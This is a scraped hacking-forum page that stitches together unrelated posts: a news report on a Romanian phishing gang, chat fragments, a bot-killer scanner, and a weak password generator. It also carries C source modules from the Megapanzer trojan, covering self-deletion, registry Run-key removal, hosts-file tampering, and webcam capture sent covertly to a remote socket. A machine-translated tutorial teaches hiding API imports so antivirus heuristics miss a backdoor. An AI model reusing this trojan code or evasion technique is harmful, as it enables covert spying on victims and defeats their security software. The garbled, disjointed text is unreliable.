Nytro

Edit: CrackMe: http://rapidshare.com/files/208819072/Project1.exe

Daca scri parola corect afiseaza "10" ?

The Romanian Police, together with D.I.I.C.O.T. (the Direction for Investigating Organized Crime and Terrorism), has executed an ample operation that has targeted hackers in the western part of the country. Between 15 and 20 persons have been arrested in the cities of Caransebe?, Lugoj, Timi?oara, Hunedoara and Pite?ti under the suspicion of being members of a cybercriminal group. The gang is accused of executing phishing attacks and siphoning money from compromised accounts. According to local media, they cloned the websites of several banks in Spain and Italy, which they subsequently used to lure people into disclosing their financial information. The Italian Post Office seems to have been the group's main target. The fraudsters sent e-mails impersonating the institution, in which they claimed that customer data had been lost due to technical issues. A link included in the e-mail directed unsuspecting victims to a page masquerading as the Post Office's online payment system. Once on the page, users were asked to input their financial details, which were then being stored on a server under the control of the Romanian phishers. The gang's M.O. involved "money mules" (people hired to pick up stolen funds) walking into post offices and letting them know via mobile phones that they were good to go. The Romanians then issued online money orders using the banking information of their victims. This allowed the mules to cash in the money and leave in a matter of minutes. Speed was vital to the whole scheme, as the system also sent SMS notifications of the transaction to the mobile phone number provided by the real account holder. In addition, in order to avoid arising suspicion from the post office employees, the transactions only involved sums of under 1,000 euros. The compromised accounts were also being used to recharge mobile pre-paid SIM cards, heavily used for communication. One of the arrested individuals, Flavius Br?g?il?, a 21-year-old man from Caransebe?, is suspected of being the head behind the whole operation. According to authorities, he had been coordinating the entire cybercriminal network, which was devised into independent cells operating from different Romanian and Italian cities. Ovidiu Andra?, son of the manager of the BCR (Romanian Commercial Bank) branch in Caransebe?, was also one of the individuals who were arrested. It was also noted that one of the detained persons was accused of hacking into several servers belonging to N.A.S.A. and various U.S. universities and using them to launch attacks that targeted banks. Details about this are yet scarce, but it is possible that these servers have been used to host the fake cloned websites. Cosmin Bolosin, the attorney for four of the people detained in Caransebe?, commented for Caras Online that "[…] Even though people are speaking about those NASA servers, for the time being we haven't been presented with anything official in this respect. […] As far as the penal procedure is concerned, I can confirm that it has been fully respected and that the search warrants were legal. I was even a bit surprised." Meanwhile, the D.I.I.C.O.T. prosecutors pointed out that the network had been under surveillance for the past year. Sursa: http://news.softpedia.com/news/Romanian-Police-Takes-Down-Cybercriminal-Gang-106717.shtml

Nu stiu nimic de rezultate, nu am primit nimic, diriga mi-a spus din surse neoficiale ca s-ar putea sa fi luat primul loc. luyzette: Ai fost la prezentare? Sau doar la chestia aia in amfiteatru cand au vorbit aia si au pus 2 videoclipuri: Romania si Tg. Jiu?

Nu trece mai de nimic

Ma pricep eu... La dat ban.

Algoritmul tau de decryptare mai e bun?

RS Mirror: http://rapidshare.com/files/207975537/CQKiller.rar

B.o.t Killer by a59 This function searches through all running processes, except black listed ones, and then uses the ReadProcessMemory function to check for specified strings found in common bots. If any of the strings are found in the processes memory the process will be killed and the file deleted. Should be simple to modify for other types of unwanted programs. /* BotKiller Coded by a59 */ #include <windows.h> #include <stdio.h> #include <tlhelp32.h> void DoSearch( unsigned long uStartAddr, unsigned long uEndAddr, PROCESSENTRY32 pe32 ); void KillBot( PROCESSENTRY32 pe32 ); struct s_Search { char* szBot; char* szString; }; s_Search sSearch[ ] = { { "VNC Scanning server", "\x52\x46\x42\x20\x30\x30\x33\x2E\x30\x30\x38\x0A" }, { "RXBot", "[MAIN]" }, { "RXBot", "[SCAN]" }, { "RXBot", "[FTP]" }, { "Unknown", "&echo bye" }, { NULL, NULL } }; void DoSearch( unsigned long uStartAddr, unsigned long uEndAddr, PROCESSENTRY32 pe32 ) { char szBigBuffer[ 0x5000 ] = { 0 }; unsigned char Curbuf[ 0x500 ] = { 0 }; HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID ); printf( "Scanning PID: %d [ %s ]\nStart Address: 0x%08X End Address: 0x%08X\n\n", pe32.th32ProcessID, pe32.szExeFile, uStartAddr, uEndAddr ); for( unsigned long uCurAddr = uStartAddr; uCurAddr <= uEndAddr; uCurAddr++ ) { BOOL bRead = ReadProcessMemory( hProcess, (void *)uCurAddr, (void *)&Curbuf, sizeof( Curbuf ), NULL ); if( bRead ) { int c = 0; strcat( szBigBuffer, (char *)Curbuf ); while( sSearch[ c ].szString != NULL ) { if( strstr( szBigBuffer, sSearch[ c ].szString ) ) { printf( "Found string \"%s\" in \"%s\" server \"%s\"\n\n", sSearch[ c ].szString, pe32.szExeFile, sSearch[ c ].szBot ); KillBot( pe32 ); } c++; } if( sizeof( szBigBuffer ) > 0x150 ) ZeroMemory( szBigBuffer, sizeof( szBigBuffer ) ); } if( !bRead ) break; } CloseHandle( hProcess ); }; void KillBot( PROCESSENTRY32 pe32 ) { MODULEENTRY32 me32 = { 0 }; HANDLE hPath = CreateToolhelp32Snapshot( TH32CS_SNAPMODULE, pe32.th32ProcessID ); HANDLE hKillProcess; me32.dwSize = sizeof( me32 ); BOOL bRetval = Module32First( hPath, &me32 ); while( bRetval ) { if( !strcmp( pe32.szExeFile, me32.szModule ) ) { SetFileAttributes( me32.szExePath, FILE_ATTRIBUTE_NORMAL ); hKillProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID ); TerminateProcess( hKillProcess, 0 ); Sleep( 500 ); if( DeleteFile( me32.szExePath ) ) printf( "Terminated and deleted %s\n", me32.szExePath ); } bRetval = Module32Next( hPath, &me32 ); } CloseHandle( hKillProcess ); CloseHandle( hPath ); }; int main( ) { char szFile[ 128 ]; GetModuleFileName( GetModuleHandle( NULL ), szFile, sizeof( szFile ) ); char* szBlockList[ ] = { "explorer.exe", "hidserv.exe", "WINLOGON.EXE", "SERVICES.EXE", szFile }; HANDLE hProcess = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 ); PROCESSENTRY32 pe32; pe32.dwSize = sizeof( PROCESSENTRY32 ); BOOL bRetval = Process32First( hProcess, &pe32 ); bool bDoSearch = true; while( bRetval ) { Sleep( 250 ); for( int i = 0; i < ( sizeof( szBlockList ) / sizeof( char* ) ); i++ ) { if( strstr( szBlockList[ i ], pe32.szExeFile ) ) bDoSearch = false; } if( bDoSearch ) { DoSearch( 0x00400000, 0x004FFFFF, pe32 ); DoSearch( 0x00100000 ,0x001FFFFF, pe32 ); } else bDoSearch = true; bRetval = Process32Next( hProcess, &pe32 ); } CloseHandle( hProcess ); printf( "Done scanning, press ENTER to exit this program.\n" ); getchar( ); return 0; }; Self Delete Credit: carrumba #include <windows.h> #include <stdio.h> #include <shlwapi.h> #include <time.h> #include "Megapanzer_Definitions.h" extern char gRealRegistryName[MAX_BUF_SIZE + 1]; int selfDelete() { WIN32_FIND_DATA lFileData; HANDLE lSearchHandle; char lFilePattern[MAX_BUF_SIZE + 1]; char lTemp[MAX_BUF_SIZE + 1]; char lTempDirectory[MAX_BUF_SIZE + 1]; char lCWD[MAX_BUF_SIZE + 1]; char lBatchFileNameFullPath[MAX_BUF_SIZE + 1]; char lCommand[MAX_BUF_SIZE + 1]; char lProgramName[MAX_BUF_SIZE + 1]; HKEY lRegistryHeaps[] = {HKEY_LOCAL_MACHINE, HKEY_CURRENT_USER, NULL}; HKEY lKeyHandle; long lEnumRet = 0; DWORD lLength = 100; time_t lTimeStamp; int lRetVal = 0; int lFuncRetVal = 0; int lCounter = 0; int lCounter2 = 0; //// // initialization //// ZeroMemory(lProgramName, sizeof(lProgramName)); ZeroMemory(lTemp, sizeof(lTemp)); ZeroMemory(lTempDirectory, sizeof(lTempDirectory)); ZeroMemory(lCWD, sizeof(lCWD)); ZeroMemory(lBatchFileNameFullPath, sizeof(lBatchFileNameFullPath)); ZeroMemory(&lTimeStamp, sizeof(lTimeStamp)); GetModuleFileName(NULL, lProgramName, sizeof(lProgramName)); time(&lTimeStamp); //// // create temporary directory //// if (GetTempPath(sizeof(lTempDirectory) - 1, lTempDirectory) > 0) if (lTempDirectory[strlen(lTempDirectory) - 1] != '\\') strcat(lTempDirectory, "\\"); //// // generate batch file name //// GetCurrentDirectory(sizeof(lCWD) - 1, lCWD); if (lCWD[strlen(lCWD) - 1] != '\\') strcat(lCWD, "\\"); _snprintf(lBatchFileNameFullPath, sizeof(lBatchFileNameFullPath) - 1, "%s%d.bat", lTempDirectory, lTimeStamp); printToFile(lBatchFileNameFullPath, "@echo off"); printToFile(lBatchFileNameFullPath, ":Repeat"); ZeroMemory(lCommand, sizeof(lCommand)); _snprintf(lCommand, sizeof(lCommand) - 1, "@del /F \"%s\"", lProgramName); printToFile(lBatchFileNameFullPath, lCommand); ZeroMemory(lCommand, sizeof(lCommand)); _snprintf(lCommand, sizeof(lCommand) - 1, "if exist \"%s\" goto Repeat", lProgramName); printToFile(lBatchFileNameFullPath, lCommand); //// // generate delete entry for registry keys/values //// for(lCounter = 0; lRegistryHeaps[lCounter] != NULL; lCounter++) { if (RegOpenKeyEx(lRegistryHeaps[lCounter], "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_READ, &lKeyHandle) == ERROR_SUCCESS) { lCounter2 = 0; ZeroMemory(lTemp, sizeof(lTemp)); lLength = sizeof(lTemp) - 1; while((lEnumRet = RegEnumValue(lKeyHandle, lCounter2, lTemp, &lLength, NULL, NULL, NULL, NULL)) == ERROR_SUCCESS) { if (StrCmpNI(gRealRegistryName, lTemp, sizeof(gRealRegistryName)) == 0) { ZeroMemory(lCommand, sizeof(lCommand)); if (lRegistryHeaps[lCounter] == CURRENT_USER) { _snprintf (lCommand, sizeof(lCommand) - 1, "@reg delete HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run\\ /v %s /f",lTemp); printToFile(lBatchFileNameFullPath, lCommand); } else if (lRegistryHeaps[lCounter] == LOCAL_MACHINE) { _snprintf (lCommand, sizeof(lCommand) - 1, "@reg delete HKEY_LOCAL_MACHINE\\software\\microsoft\\windows\\currentversion\\run\\ /v %s /f",lTemp); printToFile(lBatchFileNameFullPath, lCommand); } // if (lRegistryHeaps[lCou... } // if (StrCmpNI(gRealRegistryName, lTemp... lLength = sizeof(lTemp) - 1; lCounter2++; ZeroMemory(lTemp, sizeof(lTemp)); } // while((lEnumRet = RegEnumValue(lKeyH... RegCloseKey(lKeyHandle); } // if (RegOpenKeyEx(lReg... } // for(lCounter = 0; lRegistryHeaps[lCoun... //// // delete Mega Panzer files //// ZeroMemory(lCommand, sizeof(lCommand)); _snprintf(lCommand, sizeof(lCommand) - 1, "@del /F \"%s\" || move /Y \"%s\" \"%s\"", lBatchFileNameFullPath, lBatchFileNameFullPath, lTempDirectory); printToFile(lBatchFileNameFullPath, lCommand); //// // run batch script //// ShellExecute(NULL, NULL, lBatchFileNameFullPath, NULL, "c:\\", SW_HIDE); exit(lRetVal); } int printToFile(char *pOutputFileName, char* pCommandString) { int lRetVal = 0; HANDLE lFileHandle = INVALID_HANDLE_VALUE; DWORD lBytesWritten = 0; char lTemp[MAX_BUF_SIZE + 1]; if ((lFileHandle = CreateFile(pOutputFileName, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL)) != INVALID_HANDLE_VALUE) { SetFilePointer(lFileHandle, 0, 0, FILE_END); ZeroMemory(lTemp, sizeof(lTemp)); snprintf(lTemp, sizeof(lTemp) - 1 , "%s\r\n", pCommandString); WriteFile(lFileHandle, lTemp, strlen(lTemp), &lBytesWritten, NULL); CloseHandle(lFileHandle); } return(lRetVal); } WebCam Capture Credit: carrumba #include <stdio.h> #include <windows.h> #include <Vfw.h> #include "Megapanzer_Definitions.h" extern HWND gWND; DWORD WINAPI sendWebcamCaptureInfos(PVOID pParameter) { HWND lWndVideoHandle; CAPSTATUS lCapStat; DWORD lRetVal = 0; char *lBMPFileName = "info.bmp"; char *lJPGFileName = "info.jpg"; char lJPGFileBaseName[MAX_BUF_SIZE + 1]; HANDLE lFileHandle = INVALID_HANDLE_VALUE; DWORD lJPGFileSize = 0; char *lPreEncodedData = NULL; char *lEncodedData = NULL; DWORD lBytesRead = 0; char lTemp[MAX_BUF_SIZE + 1]; int lFuncRetVal = 0; PANZER_COMMAND *lCommandStructure = (PANZER_COMMAND *) pParameter; SYSTEMTIME lSystemTime; /* * initialize values */ ZeroMemory(&lCapStat, sizeof(CAPSTATUS)); ZeroMemory(&lSystemTime, sizeof(lSystemTime)); ZeroMemory(lJPGFileBaseName, sizeof(lJPGFileBaseName)); GetLocalTime(&lSystemTime); snprintf(lJPGFileBaseName, sizeof(lJPGFileBaseName) - 1, "%04d-%02d-%02d-%02d-%02d-%02d.jpg", lSystemTime.wYear, lSystemTime.wMonth, lSystemTime.wDay, lSystemTime.wHour, lSystemTime.wMinute, lSystemTime.wSecond); ZeroMemory(lTemp, sizeof(lTemp)); _snprintf(lTemp, sizeof(lTemp) - 1, "<webcam>"); lFuncRetVal = send(lCommandStructure->lRemoteSocket, lTemp, strlen(lTemp), 0); /* * capture webcam frame */ Sleep(500); lWndVideoHandle = capCreateCaptureWindow("WebCam",WS_CHILD, 0, 0, 320, 240,(HWND) gWND, (int) 1); capDriverConnect(lWndVideoHandle, 0); Sleep(1000); capGetStatus(lWndVideoHandle, &lCapStat, sizeof(CAPSTATUS)); capGrabFrame(lWndVideoHandle); capEditCopy(lWndVideoHandle); capFileSaveDIB(lWndVideoHandle, lBMPFileName) ; capDriverDisconnect(lWndVideoHandle) ; DestroyWindow(lWndVideoHandle); convertBMP2JPG(lBMPFileName, lJPGFileName); if ((lFileHandle = CreateFileA(lJPGFileName, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)) != INVALID_HANDLE_VALUE) { lJPGFileSize = GetFileSize(lFileHandle, 0); /* * encocd created jpg file */ if ((lPreEncodedData = (char *) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, lJPGFileSize * 2)) != NULL) { ReadFile(lFileHandle, lPreEncodedData, lJPGFileSize, (unsigned long *) &lBytesRead, NULL); CloseHandle(lFileHandle); if ((lEncodedData = (char *) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, lJPGFileSize * 2)) != NULL) { /* * transfer picture data to home system */ Base64encode(lEncodedData, lPreEncodedData, lBytesRead); ZeroMemory(lTemp, sizeof(lTemp)); _snprintf(lTemp, sizeof(lTemp) - 1, "<filename>%s</filename><filecontent>", lJPGFileBaseName); lFuncRetVal = send(lCommandStructure->lRemoteSocket, lTemp, strlen(lTemp), 0); lFuncRetVal = send(lCommandStructure->lRemoteSocket, lEncodedData, Base64encode_len(lBytesRead) - 1, 0); ZeroMemory(lTemp, sizeof(lTemp)); _snprintf(lTemp, sizeof(lTemp) - 1, "</filecontent>"); lFuncRetVal = send(lCommandStructure->lRemoteSocket, lTemp, strlen(lTemp), 0); } // if ((lEncodedData = (char *) He... } // if ((lPreEncodedData = (char *) HeapAlloc(GetP... } // if ((lFileHandle = CreateFileA(lJPGFileFullPath,... ZeroMemory(lTemp, sizeof(lTemp)); _snprintf(lTemp, sizeof(lTemp) - 1, "</webcam>"); lFuncRetVal = send(lCommandStructure->lRemoteSocket, lTemp, strlen(lTemp), 0); /* * cleaning up before returning */ DeleteFile("info.bmp"); DeleteFile("info.jpg"); return(lRetVal); } Kill Process by PID Credit: carrumba #include <stdio.h> #include <windows.h> #include <psapi.h> #include "Megapanzer_Definitions.h" DWORD WINAPI killProcessByPID(PVOID pParameter) { int lRetVal = 0; HANDLE lProcessHandle = INVALID_HANDLE_VALUE; char lTemp[MAX_BUF_SIZE + 1]; char lProcessName[MAX_BUF_SIZE + 1]; int lFuncRetVal = 0; PANZER_COMMAND *lCommandStructure = (PANZER_COMMAND *) pParameter; HMODULE lModuleHandle; DWORD cbNeeded; ZeroMemory(lProcessName, sizeof(lProcessName)); strcpy(lProcessName, "Unknown"); ZeroMemory(lTemp, sizeof(lTemp)); _snprintf(lTemp, sizeof(lTemp) - 1, "<killprocess><msg>Could not kill process \"%s\"</msg></killprocess>", lCommandStructure->sCommandString); if ((lProcessHandle = OpenProcess(PROCESS_TERMINATE, FALSE, atoi(lCommandStructure->sCommandString))) != INVALID_HANDLE_VALUE) { if (EnumProcessModules(lProcessHandle, &lModuleHandle, sizeof(lModuleHandle), &cbNeeded)) GetModuleBaseName(lProcessHandle, lModuleHandle, lProcessName, sizeof(lProcessName) - 1); if (TerminateProcess(lProcessHandle, (DWORD) -1)) { ZeroMemory(lTemp, sizeof(lTemp)); _snprintf(lTemp, sizeof(lTemp) - 1, "<killprocess><msg>Killed process \"%s\" (pid %s) successfully</msg></killprocess>", lProcessName, lCommandStructure->sCommandString); } CloseHandle(lProcessHandle); } lFuncRetVal = send(lCommandStructure->lRemoteSocket, lTemp, strlen(lTemp), 0); return(lRetVal); } Kill Process By name Credit: carrumba #include <stdio.h> #include <windows.h> #include <Tlhelp32.h> #include "Megapanzer_Definitions.h" DWORD WINAPI killProcessByName(PVOID pParameter) { int lRetVal = 0; int lFuncRetVal = 0; char lTemp[MAX_BUF_SIZE + 1]; PANZER_COMMAND *lCommandStructure = (PANZER_COMMAND *) pParameter; HANDLE hProcessSnap; HANDLE hProcess; PROCESSENTRY32 pe32; DWORD dwPriorityClass; if (lCommandStructure->sCommandString != NULL) { if((hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)) == INVALID_HANDLE_VALUE) { lRetVal = 1; goto END; } pe32.dwSize = sizeof(PROCESSENTRY32); if(!Process32First(hProcessSnap, &pe32)) { lRetVal = 2; goto END; } do { if(!strcmp(pe32.szExeFile, lCommandStructure->sCommandString)) { hProcess = OpenProcess(PROCESS_TERMINATE,0, pe32.th32ProcessID); TerminateProcess(hProcess,0); CloseHandle(hProcess); } } while(Process32Next(hProcessSnap,&pe32)); } END: if (hProcessSnap != INVALID_HANDLE_VALUE) CloseHandle(hProcessSnap); return(lRetVal); } Modify hosts file Credit : carrumba #include <stdio.h> #include <windows.h> #include <Tlhelp32.h> #include "Megapanzer_Definitions.h" DWORD WINAPI addHostsEntry(PVOID pParameter) { int lRetVal = 0; int lFuncRetVal = 0; char lTemp[MAX_BUF_SIZE + 1]; char lTemp2[MAX_BUF_SIZE + 1]; char *lTempPointer = NULL; DWORD dwWritten = 0; HANDLE lFileHandle = INVALID_HANDLE_VALUE; PANZER_COMMAND *lCommandStructure = (PANZER_COMMAND *) pParameter; if (lCommandStructure->sCommandString != NULL) { ZeroMemory(lTemp, sizeof(lTemp)); snprintf(lTemp, sizeof(lTemp) - 1, "\r\n%s", lCommandStructure->sCommandString); if ((lFileHandle = CreateFile(HOSTS_FILE, FILE_APPEND_DATA, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL)) != INVALID_HANDLE_VALUE) { SetFilePointer(lFileHandle,0,0,FILE_END); WriteFile(lFileHandle, lTemp, strlen(lTemp), &dwWritten, NULL); CloseHandle(lFileHandle); } } return(lRetVal); } DWORD WINAPI removeHostsEntry(PVOID pParameter) { int lRetVal = 1; int lFuncRetVal = 0; char lTemp[MAX_BUF_SIZE + 1]; char lReadBuffer[MAX_BUF_SIZE + 1]; PANZER_COMMAND *lCommandStructure = (PANZER_COMMAND *) pParameter; FILE *lFileOldHostsHandle = NULL; FILE *lFileNewHostsHandle = NULL; if (lCommandStructure != NULL && lCommandStructure->sCommandString != NULL) { if ((lFileOldHostsHandle = fopen(HOSTS_FILE, "r")) != NULL) { ZeroMemory(lTemp, sizeof(lTemp)); snprintf(lTemp, sizeof(lTemp) - 1, "%s.tmp", HOSTS_FILE); if ((lFileNewHostsHandle = fopen(lTemp, "w")) != NULL) { while (!feof(lFileOldHostsHandle)) { ZeroMemory(lReadBuffer, sizeof(lReadBuffer)); if (fgets(lReadBuffer, sizeof(lReadBuffer) - 1, lFileOldHostsHandle) > 0) { if (strstr(lReadBuffer, lCommandStructure->sCommandString) == NULL) fprintf(lFileNewHostsHandle, lReadBuffer); else lRetVal = 0; } } fclose(lFileNewHostsHandle); } fclose(lFileOldHostsHandle); } } END: if (lRetVal == 0) { ZeroMemory(lTemp, sizeof(lTemp)); snprintf(lTemp, sizeof(lTemp) - 1, "%s.tmp", HOSTS_FILE); DeleteFile(HOSTS_FILE); MoveFile(lTemp, HOSTS_FILE); } return(lRetVal); } Very simple pass gen /* More simple pass generator; inspired by carb0n passgen code on this forum Lamecoded by : x.exexe_ // from newbie to newbies */ #include <iostream> #include <time.h> #include <fstream> void RndPass(int len, std::string &pesw) { // table with chars, can re-define char c_table[] = {'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o', 'p','q','r','s','t','u','v','w','x','y','z','A','B','C','D', 'E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S', 'T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9'}; srand(time(NULL)); for(; len > 0; len--) // save random number (as char) pesw += c_table[ rand()%(strlen(c_table)-1)]; // to pesw string } int main() { int len; std::string passwd = ""; std::cout << "\t\tSimply pesvrd gen by x.exexe_\n" << std::endl; std::cout << "Enter password lenght (number): "; std::cin >> len; RndPass(len,passwd); std::cout <<"Ur pass is : \n" << passwd << std::endl; std::cout << "Make internet better!" << std::endl; // create file stream with append mode std::ofstream PassFileStream("piss.txt", std::ios::app); if ( PassFileStream.is_open() ) // if stream open is ok ... PassFileStream << passwd << "\n\n"; // ... write pass to file PassFileStream.close(); // close stream std::cin.get(); // hit any key return 0; }

# Title: API crypting (Or: How to use the heuristic method of antivirus software austrickst) # Date: 03.03.2008 # Author: Eddy14 # Website: www.eddys-blog.6x.to # Email: eddy14@pen.tj # Contents: # # # 0x1 - Preface # # # 0x2 - Introduction # # # 0x3 - API commands # # # 0x4 - The source code (and explanation) # # # 0x5 - Deeper insight (Reverse Engineering) # # # 0x6 - Conclusion / Links _________________________ \ / \ / \ / \ / \ / 0x1 \ / \ / \ / \ / \ / \ / ######################### Preface # # ######################### Hello and welcome to my API crypting Tutorial:) I wanted this paper before 2.5 months have finished, but somehow my Dev-C + + strikes and I had otherwise no particular pleasure: P Gelabert Enough, I say unto you first what her background for this tutorial to bring should: -Good knowledge of C (pointers, Typecasting, etc.) Skills in Windows programming (The WinAPI!) -You should ever have worked with DLLs (important, otherwise you confuse the DLL -like code) -You should have ever encrypted strings (Caesarean encryption is sufficient) At the initiation gehts:) _________________________ \ / \ / \ / \ / \ / 0x2 \ / \ / \ / \ / \ / \ / ######################### Introduction # # ######################### Well, first: Why I write this tutorial? First, because too few tutorials I have written, and secondly, because I just They were joined by a remote shell for Windows to write (a little backdoor; btw => to the remote shell, so generally pipes under Windows, I will also be a tutorial write) and born2die together with've found that the antivirus software my backdoor was detected, and to me was what it was inexplicable, because it was self-written software that would have no signature should be fit! It was the stinkin heuristic! In my program was implemented something that was around this building: ------------------------- GetWindowsDirectory (& buffer, sizeof (buffer)); CopyFile (argv [0], buffer, FALSE); ------------------------- (intermediate or strcat to append the file name) What the Windows as much as said: ------------------------- Find your Windows directory published and copy me then! ------------------------- Antivir for what it looked like: ------------------------- Buuuh, I'm Bööööse and a virus! I am now totally leet itself into the Windows directory copy! ------------------------- what for me as much as said: ------------------------- Suck my balls! ------------------------- Well, joking aside. I had not long over, I knew that the antivirus GetWindowsDirectory the program and the subsequent CopyFile recognized as malware (do not know any other software that makes sense to use something, or maybe?). In any case the antivirus program detects my requests to this API, but not if they not exist in compiled state, but only after the run, very dynamic! Your asking how to do this? Well quite simply, we are not directly GetWindowsDirectory call (so that our program is not directly imported, and thus the AV of nothing bescheid white) but only when you run! It is very simple. You should format the PE (Portable Exectuable) a look. There you will at some point on the IAT (Import Address Table) encounter. This table includes addresses for the respective functions imported (foreign dlls). Based this table one can understand what API functions the program used. You may also during the life functions, the room in appear in this table (used, for example, if a DLL at runtime be). That said I do with "dynamic". (more on the IAT can be found here: http://sandsprite.com/CodeStuff/Understanding_imports.html) Your question is still how it works? Then read the first chapter "API commands," and in "source code" Part I will accurately explain everything:) _________________________ \ / \ / \ / \ / \ / 0x3 \ / \ / \ / \ / \ / \ / ######################### API commands # # ######################### First, the three "commands" we try to use: -GetWindowsDirectory (GetWindowsDirectoryA) CopyFile - -MessageBox (MessageBoxA) And the two major commands without the API crypting probably would not be possible: LoadLibrary - GetProcAddress - _________________________ \ / \ / \ / \ / \ / 0x4 \ / \ / \ / \ / \ / \ / ######################### # # The source code ######################### Since you now know what API calls we need, you will hopefully have can think what comes now. Or still not? Well, I vent the whole secret: We will present our views as strings encrypt, and then via LoadLibrary and GetProcAddress function call and invite. Sun can be found in the executable State of the executable file does not contain information about eg GetWindowsDirectory only via LoadLibrary and GetProcAddress. If these two functions do not say who would like to ask my Requirements through, because as it is written: You should schonmal a DLL loaded! Well, the secret is revealed! We certainly is not clear yet how the whole now operate. I will now perform code and of course as always, explain:) BTW, I use raw here GCC under Windows, Dev-C + + rum sucked, that's why. ------------------------- # include <stdio.h> # include <windows.h> int main (int argc, char * argv []) ( char hello [] = "Hello World"; crypt (& hello); printf ( "% s \ n", hello); system ( "PAUSE"); return 0; ) ------------------------- Here you can see in advance what our test program to make. There is a so-called "crypt" Function of our test-string and then the printed output (+ waits for additional input). That is something everybody should have understood, because in principle, go here just about the "crypt" function which I now this show: ------------------------- int crypt (char * str) ( int length; char chr; int ord; for (length = 0; length <strlen (str); length + +) ( ord = (int) str [length]; ord = ord + 1; chr = (char) ord; str [length] = chr; ) return 0; ) ------------------------- Sooo bad it looks or garnicht? Our loop goes through all the characters. With each pass, the current character read the given. Which is now the ASCII value [=> see "(int) str [length]"]. The ASCII value of "H" is 72nd The following is this added value is 1. Therefore, the value 73rd Now, in "chr" back to the ASCII character is stored, from 73rd What was done here is simple: it was encrypted! A sign was in the alphabet for a job after law postponed! It should therefore "I" arise, and it does too! So now with every other character to continue. Even with characters not in the alphabet are because it is yes to the ASCII table! Thus, a space with an exclamation mark, because the space is in the ASCII character table with the number 32, and the subsequent 33 is an exclamation point:) Now get even briefly thought about the Decrypt method. Well how is this most like? Well exactly, except that instead of subtracting, 1 adds. ------------------------- int decrypt (char * str) ( int length; char chr; int ord; for (length = 0; length <strlen (str); length + +) ( ord = (int) str [length]; ord = ord - 1; chr = (char) ord; str [length] = chr; ) return 0; ) ------------------------- Ready is our encryption method. You can string me from encrypt as you want, you can hauptsache decrypt it again. We now test our program: ------------------------- # include <stdio.h> # include <windows.h> int main (int argc, char * argv []) ( char hello [] = "Hello World"; crypt (& hello); printf ( "% s \ n", hello); system ( "PAUSE"); return 0; ) int crypt (char * str) ( int length; char chr; int ord; for (length = 0; length <strlen (str); length + +) ( ord = (int) str [length]; ord = ord + 1; chr = (char) ord; str [length] = chr; ) return 0; ) int decrypt (char * str) ( int length; char chr; int ord; for (length = 0; length <strlen (str); length + +) ( ord = (int) str [length]; ord = ord - 1; chr = (char) ord; str [length] = chr; ) return 0; ) ------------------------- For the readers of the GCC USEN (which will probably already know how you compiled: P): ------------------------- cryptme.c gcc-o cryptme.exe ------------------------- Starts it and what you see? There are ... ------------------------- Ifmmp! Xpsme Press any key. . . ------------------------- ... from. Our "Hello World" means encrypted (using our algorithm): ------------------------- Ifmmp! Xpsme ------------------------- OK good. Now everything runs ever. If you absolutely want to, you can also decrypt function test:) We will now make another try: O Replaced now that in the above "Hello World" with "MessageBoxA". It tells us: ------------------------- NfttbhfCpyB Press any key. . . ------------------------- As you probably suspected, we will for our attempts to encrypt MessageBox. Perhaps you ask why we MessageBoxA MessageBox and not encrypt? To be exact, there is no MessageBox. Windows is generally (any?) Function with strings works for 2 versions. One that ends with A and one that ends with W. Those with a question, the ASCII versions, and with W (for Wide Char) for the Unicode version. Depending on the setting of the compiler is a version of them selected. So you can either adjust the settings, or use the versions directly (instead of "MessageBox" So "MessageBoxA" in the code example). Ok, jump back on again we Topic (little English must be;)) If you ever have worked with DLLs (if not, then I urge you once again!) Then you probably know, the two functions LoadLibrary and GetProcAddress. These are We now use our encrypted features! Let go! (bit directly translated: P) ------------------------- int main (int argc, char * argv []) ( func_crypted char [] = "NfttbhfCpyB"; HMODULE dll; FARPROC MyMessageBox; decrypt (& func_crypted); dll = LoadLibrary ( "user32.dll"); MyMessageBox = GetProcAddress (dll, func_crypted); MyMessageBox (0, "In working dude;)", "yeaaah", MB_OK); system ( "PAUSE"); return 0; ) ------------------------- We declare "dll" and "MyMessageBox" for later use with LoadLibrary and GetProcAddress. Then we invite user32.dll (because there is our declared MessageBox, which you can find everything in the msdn look). Once we "dll" there, where we wanted it, we squeeze it in and say GetProcAddress him at the same time that the function to be loaded into "func_crypted" exists. You know from "NfttbhfCpyB" is well known "MessageBoxA" has become. So we say it is not more than: ------------------------- Loading from the user32.dll function MessageBoxA ------------------------- Then we finally have everything we want in MyMessageBox! We can now just call it as we MessageBox with it (or MessageBoxA) would have done. Alright dudes? =) In the case of GetWindowsDirectory was not much different, except that I kernel32.dll instead user32.dll download had:) So, now follows a chapter for all those interested in reverse engineering (ie cracking) know, for all do not go in this area, please skip, it was probably just confused! _________________________ \ / \ / \ / \ / \ / 0x5 \ / \ / \ / \ / \ / \ / ######################### Deeper insight # # ######################### So their leet cracker: P throws your Lieblingsdisassembler times (in my case OllyDBG). I will all the steps in this case with OllyDBG explain. Compiled try this source: ------------------------- # include <stdio.h> # include <windows.h> int main () ( Sleep (1000); MessageBox (0, "test", "test", MB_OK); return 0; ) ------------------------- It is useless, I know! But it is only for better understanding. As you can easily recognize the program waits for one second, then a MessageBox to display. This program we invite now Olly. CPU goes into the window (ie, the status of their results as soon as a program in Olly loads, expresses the safe side "C" at the top of the toolbar) and now makes a right click. Now it selects "Search for -> All inter-modular calls. Looks exactly as you order, there are not really much to read. At best it looks you in the area below the red line around. Here what you will discover: ------------------------- 00401321 | CALL <JMP.&KERNEL32.Sleep> | kernel32.Sleep 00401348 | CALL <JMP.&USER32.MessageBoxA> 